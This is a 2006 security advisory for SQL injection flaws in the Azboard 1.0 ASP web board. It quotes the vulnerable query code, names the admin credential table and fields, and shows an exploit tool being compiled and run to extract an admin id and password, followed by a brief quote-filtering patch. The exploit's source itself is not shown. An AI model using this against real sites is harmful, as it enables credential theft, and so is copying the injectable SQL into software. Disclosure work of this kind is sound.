Azboard <= 1.0 Multiple Sql Injections

2006.05.23
Credit: geinblues
Risk: Medium
Local: No
Remote: Yes
CVE: CVE-2006-2504
CWE: CWE-Other


CVSS Base Score: 7.5/10
Impact Subscore: 6.4/10
Exploitability Subscore: 10/10
Exploit range: Remote
Attack complexity: Low
Authentication: No required
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: Partial

Title : Azboard <= 1.0 Multiple Sql Injections Published : 2006.5.14 Author : x90c(&#51221;&#44221;&#51452;)@chollian.net/~jyj9782/ Link : http://user.chol.com/~jyj9782/sec/azboard_advisory.txt 0x01 Summary Azboard is a web board written in asp (active server pages). It has a sql injection hole. so we can get the admin(bbs)'s Id and password and so on. let's start to see what is the code.. 0x02 Codes ~/azboard/list.asp: - 49: if searchstring<>"" then 50: sql="select count(board_idx) from board where " & search & " like '%" & searchstring & "%' and cate='"&cate&"' " 51: else 52: sql="select count(board_idx) from board where cate='"&cate&"'" 53: end if - above lines are vulnerable to sql attak as you can see. y0! ;)~ ~/azboard/admin_ok.asp: - 27: SQL = "SELECT cate,admin_id,admin_pass,board_name FROM board_admin where admin_id='"&id&"' and cate='"&cate&"'" - i found the fields('admin_id', 'admin_pass') and table('board_admin') in this file. 0x03 Exploit [root@ebp exploits]# ls -al azboard_blue.c -rw-r--r-- 1 root root 4771 5&#50900; 14 23:30 azboard_blue.c [root@ebp exploits]# ls -al azboard_blue -rwxr-xr-x 1 root root 17163 5&#50900; 14 23:30 azboard_blue [root@ebp exploits]# [root@ebp exploits]# make azboard_blue cc azboard_blue.c -o azboard_blue azboard_blue.c: In function `tu1': azboard_blue.c:55: warning: assignment makes pointer from integer without a cast azboard_blue.c:59: warning: assignment makes pointer from integer without a cast azboard_blue.c:63: warning: assignment makes pointer from integer without a cast azboard_blue.c:67: warning: assignment makes pointer from integer without a cast [root@ebp exploits]# ./azboard_blue azaboard 1.0 <= 0day : $ ./azboard_blue <azboard URL> <cate> ~ x90c (at) chollian (dot) net [email concealed]/~jyj9782 [root@ebp exploits]# [root@ebp exploits]# ./azboard_blue http://192.168.0.5 testbbs [ LANG=KOR admin id ] admin [ LANG=KOR admin pass ] 1234 [root@ebp exploits]# 0x04 Patch ~/azboard/list.asp: .. if instr(search, "'") > 0 or instr(cate, "'") > 0 or instr(cate, "'") > 0 then Response.redirect "error.asp" end if .. Thanks for many 0p3n-H4ck3rz! - Blu3h4t Team.


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top